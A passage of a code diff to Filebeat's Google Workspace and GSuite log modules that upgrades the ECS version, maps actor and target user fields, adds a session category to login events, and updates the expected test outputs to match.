"user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3324,7 +3693,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3376,7 +3751,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3428,7 +3809,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3479,7 +3866,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3530,7 +3923,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3581,7 +3980,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3632,7 +4037,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3683,7 +4094,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3734,7 +4151,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3784,7 +4207,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3835,6 +4261,12 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/google_workspace/config/common.js b/x-pack/filebeat/module/google_workspace/config/common.js index a031e4e26aa6..d918512df4ee 100644 --- a/x-pack/filebeat/module/google_workspace/config/common.js +++ b/x-pack/filebeat/module/google_workspace/config/common.js @@ -50,7 +50,10 @@ var googleWorkspace = (function () { return; } + evt.Put("user.id", evt.Get("source.user.id")); + evt.Put("user.name", data[0]); evt.Put("source.user.name", data[0]); + evt.Put("user.domain", data[1]); evt.Put("source.user.domain", data[1]); }; diff --git a/x-pack/filebeat/module/google_workspace/drive/config/config.yml b/x-pack/filebeat/module/google_workspace/drive/config/config.yml index 32dbad8bffd0..18eacfef7a20 100644 --- a/x-pack/filebeat/module/google_workspace/drive/config/config.yml +++ b/x-pack/filebeat/module/google_workspace/drive/config/config.yml @@ -45,7 +45,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 - script: lang: javascript id: gworkspace-common diff --git a/x-pack/filebeat/module/google_workspace/drive/test/drive-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/drive/test/drive-test.json.log-expected.json index 7577f101f35f..2cf11698199b 100644 --- a/x-pack/filebeat/module/google_workspace/drive/test/drive-test.json.log-expected.json +++ b/x-pack/filebeat/module/google_workspace/drive/test/drive-test.json.log-expected.json @@ -59,7 +59,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -121,7 +124,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -183,7 +189,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -245,7 +254,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -307,7 +319,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -367,7 +382,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -427,7 +445,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -487,7 +508,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -547,7 +571,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -607,7 +634,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -671,7 +701,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -731,7 +764,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -791,7 +827,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -853,7 +892,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -915,7 +957,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -975,7 +1020,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1035,7 +1083,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1095,7 +1146,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1155,7 +1209,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1215,7 +1272,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1276,7 +1336,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1342,7 +1405,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1409,7 +1475,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1476,7 +1545,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1543,7 +1615,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1610,7 +1685,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1672,7 +1750,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1740,6 +1821,9 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/google_workspace/groups/config/config.yml b/x-pack/filebeat/module/google_workspace/groups/config/config.yml index 6028d2f672a3..6d713ebdb29b 100644 --- a/x-pack/filebeat/module/google_workspace/groups/config/config.yml +++ b/x-pack/filebeat/module/google_workspace/groups/config/config.yml @@ -45,7 +45,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 - script: lang: javascript id: gworkspace-common diff --git a/x-pack/filebeat/module/google_workspace/groups/config/pipeline.js b/x-pack/filebeat/module/google_workspace/groups/config/pipeline.js index 7f91d9db844d..5b3029af0f4d 100644 --- a/x-pack/filebeat/module/google_workspace/groups/config/pipeline.js +++ b/x-pack/filebeat/module/google_workspace/groups/config/pipeline.js @@ -129,6 +129,17 @@ var groups = (function () { } evt.AppendTo("related.user", data[0]); + evt.Put("user.target.name", data[0]); + evt.Put("user.target.domain", data[1]); + evt.Put("user.target.email", email); + var groupName = evt.Get("group.name"); + if (groupName) { + evt.Put("user.target.group.name", groupName); + } + var groupDomain = evt.Get("group.domain"); + if (groupDomain) { + evt.Put("user.target.group.domain", groupDomain); + } }; var pipeline = new processor.Chain() diff --git a/x-pack/filebeat/module/google_workspace/groups/test/groups-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/groups/test/groups-test.json.log-expected.json index 1a1293419813..5faa1d30d539 100644 --- a/x-pack/filebeat/module/google_workspace/groups/test/groups-test.json.log-expected.json +++ b/x-pack/filebeat/module/google_workspace/groups/test/groups-test.json.log-expected.json @@ -57,7 +57,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -110,7 +113,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -165,7 +171,15 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.group.domain": "example.com", + "user.target.group.name": "group", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -218,7 +232,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -271,7 +288,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -327,7 +347,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -379,7 +402,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -431,7 +457,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -487,7 +516,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -542,7 +574,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -598,7 +633,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -653,7 +691,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -709,7 +750,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -765,7 +809,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -821,7 +868,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -877,7 +927,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -933,7 +986,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -989,7 +1045,15 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.group.domain": "example.com", + "user.target.group.name": "group", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1045,7 +1109,15 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.group.domain": "example.com", + "user.target.group.name": "group", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1101,7 +1173,15 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.group.domain": "example.com", + "user.target.group.name": "group", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1156,7 +1236,15 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.group.domain": "example.com", + "user.target.group.name": "group", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1211,7 +1299,15 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.group.domain": "example.com", + "user.target.group.name": "group", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1266,7 +1362,15 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.group.domain": "example.com", + "user.target.group.name": "group", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1321,7 +1425,15 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.group.domain": "example.com", + "user.target.group.name": "group", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1376,6 +1488,14 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.group.domain": "example.com", + "user.target.group.name": "group", + "user.target.name": "user" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/google_workspace/login/config/config.yml b/x-pack/filebeat/module/google_workspace/login/config/config.yml index db16922b0420..3ce48abe77bc 100644 --- a/x-pack/filebeat/module/google_workspace/login/config/config.yml +++ b/x-pack/filebeat/module/google_workspace/login/config/config.yml @@ -45,7 +45,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 - script: lang: javascript id: gworkspace-common diff --git a/x-pack/filebeat/module/google_workspace/login/config/pipeline.js b/x-pack/filebeat/module/google_workspace/login/config/pipeline.js index 62b5b8a75425..9f9610393f1c 100644 --- a/x-pack/filebeat/module/google_workspace/login/config/pipeline.js +++ b/x-pack/filebeat/module/google_workspace/login/config/pipeline.js @@ -9,14 +9,17 @@ var login = (function () { evt.Put("event.category", ["authentication"]); switch (evt.Get("event.action")) { case "login_failure": + evt.AppendTo("event.category", "session"); evt.Put("event.type", ["start"]); evt.Put("event.outcome", "failure"); break; case "login_success": + evt.AppendTo("event.category", "session"); evt.Put("event.type", ["start"]); evt.Put("event.outcome", "success"); break; case "logout": + evt.AppendTo("event.category", "session"); evt.Put("event.type", ["end"]); break; case "account_disabled_generic": @@ -83,9 +86,25 @@ var login = (function () { evt.Delete("json.events.parameters"); }; + var addTargetUser = function(evt) { + var affectedEmail = evt.Get("google_workspace.login.affected_email_address"); + if (affectedEmail) { + evt.Put("user.target.email", affectedEmail); + var data = affectedEmail.split("@"); + if (data.length !== 2) { + return; + } + + evt.Put("user.target.name", data[0]); + evt.Put("user.target.domain", data[1]); + evt.AppendTo("related.user", data[0]); + } + }; + var pipeline = new processor.Chain() .Add(categorizeEvent) .Add(processParams) + .Add(addTargetUser) .Build(); return { diff --git a/x-pack/filebeat/module/google_workspace/login/test/login-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/login/test/login-test.json.log-expected.json index 9e26d2af48b8..48f7038df80e 100644 --- a/x-pack/filebeat/module/google_workspace/login/test/login-test.json.log-expected.json +++ b/x-pack/filebeat/module/google_workspace/login/test/login-test.json.log-expected.json @@ -47,7 +47,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "elastic.co", + "user.target.email": "foo@elastic.co", + "user.target.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -97,7 +103,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "elastic.co", + "user.target.email": "foo@elastic.co", + "user.target.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -147,7 +159,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "elastic.co", + "user.target.email": "foo@elastic.co", + "user.target.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -197,7 +215,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "elastic.co", + "user.target.email": "foo@elastic.co", + "user.target.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -245,13 +269,17 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", "event.action": "login_failure", "event.category": [ - "authentication" + "authentication", + "session" ], "event.dataset": "google_workspace.login", "event.id": "1", @@ -297,7 +325,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -348,7 +379,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -400,13 +434,17 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", "event.action": "logout", "event.category": [ - "authentication" + "authentication", + "session" ], "event.dataset": "google_workspace.login", "event.id": "1", @@ -449,13 +487,17 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", "event.action": "login_success", "event.category": [ - "authentication" + "authentication", + "session" ], "event.dataset": "google_workspace.login", "event.id": "1", @@ -501,6 +543,9 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/google_workspace/saml/config/config.yml b/x-pack/filebeat/module/google_workspace/saml/config/config.yml index f0678b76cd4d..da0641282fcf 100644 --- a/x-pack/filebeat/module/google_workspace/saml/config/config.yml +++ b/x-pack/filebeat/module/google_workspace/saml/config/config.yml @@ -45,7 +45,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 - script: lang: javascript id: gworkspace-common diff --git a/x-pack/filebeat/module/google_workspace/saml/config/pipeline.js b/x-pack/filebeat/module/google_workspace/saml/config/pipeline.js index caf62937f7af..9a779f8dd884 100644 --- a/x-pack/filebeat/module/google_workspace/saml/config/pipeline.js +++ b/x-pack/filebeat/module/google_workspace/saml/config/pipeline.js @@ -7,7 +7,7 @@ var saml = (function () { var categorizeEvent = function(evt) { evt.Put("event.type", ["start"]); - evt.Put("event.category", ["authentication"]); + evt.Put("event.category", ["authentication", "session"]); switch (evt.Get("event.action")) { case "login_failure": evt.Put("event.outcome", "failure"); diff --git a/x-pack/filebeat/module/google_workspace/saml/test/saml-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/saml/test/saml-test.json.log-expected.json index ff3ef42e1c86..90f6463ce340 100644 --- a/x-pack/filebeat/module/google_workspace/saml/test/saml-test.json.log-expected.json +++ b/x-pack/filebeat/module/google_workspace/saml/test/saml-test.json.log-expected.json @@ -3,7 +3,8 @@ "@timestamp": "2020-10-02T15:00:00.000Z", "event.action": "login_failure", "event.category": [ - "authentication" + "authentication", + "session" ], "event.dataset": "google_workspace.saml", "event.id": "1", @@ -52,13 +53,17 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:01.000Z", "event.action": "login_success", "event.category": [ - "authentication" + "authentication", + "session" ], "event.dataset": "google_workspace.saml", "event.id": "1", @@ -105,6 +110,9 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/google_workspace/user_accounts/config/config.yml b/x-pack/filebeat/module/google_workspace/user_accounts/config/config.yml index 36e7e88e323b..2219d3ba1a0d 100644 --- a/x-pack/filebeat/module/google_workspace/user_accounts/config/config.yml +++ b/x-pack/filebeat/module/google_workspace/user_accounts/config/config.yml @@ -45,7 +45,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 - script: lang: javascript id: gworkspace-common diff --git a/x-pack/filebeat/module/google_workspace/user_accounts/test/user_accounts-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/user_accounts/test/user_accounts-test.json.log-expected.json index ed49851f2918..cce07c42cf24 100644 --- a/x-pack/filebeat/module/google_workspace/user_accounts/test/user_accounts-test.json.log-expected.json +++ b/x-pack/filebeat/module/google_workspace/user_accounts/test/user_accounts-test.json.log-expected.json @@ -46,7 +46,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -95,7 +98,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -144,7 +150,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -193,7 +202,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -242,7 +254,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -291,7 +306,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -340,7 +358,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -389,6 +410,9 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/gsuite/admin/config/config.yml b/x-pack/filebeat/module/gsuite/admin/config/config.yml index a0a3f17d8b77..12e3730dc939 100644 --- a/x-pack/filebeat/module/gsuite/admin/config/config.yml +++ b/x-pack/filebeat/module/gsuite/admin/config/config.yml @@ -39,7 +39,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 - script: lang: javascript id: gsuite-common diff --git a/x-pack/filebeat/module/gsuite/admin/config/pipeline.js b/x-pack/filebeat/module/gsuite/admin/config/pipeline.js index 8302ec5a1e58..9fdaa12998e7 100644 --- a/x-pack/filebeat/module/gsuite/admin/config/pipeline.js +++ b/x-pack/filebeat/module/gsuite/admin/config/pipeline.js @@ -422,6 +422,17 @@ var login = (function () { } evt.AppendTo("related.user", data[0]); + evt.Put("user.target.name", data[0]); + evt.Put("user.target.domain", data[1]); + evt.Put("user.target.email", email); + var groupName = evt.Get("group.name"); + if (groupName) { + evt.Put("user.target.group.name", groupName); + } + var groupDomain = evt.Get("group.domain"); + if (groupDomain) { + evt.Put("user.target.group.domain", groupDomain); + } }; var setEventDuration = function(evt) { diff --git a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-application-test.json.log-expected.json b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-application-test.json.log-expected.json index e33c671e30b3..835566739674 100644 --- a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-application-test.json.log-expected.json +++ b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-application-test.json.log-expected.json @@ -54,7 +54,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CREATE_APPLICATION_SETTING", @@ -110,7 +113,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "DELETE_APPLICATION_SETTING", 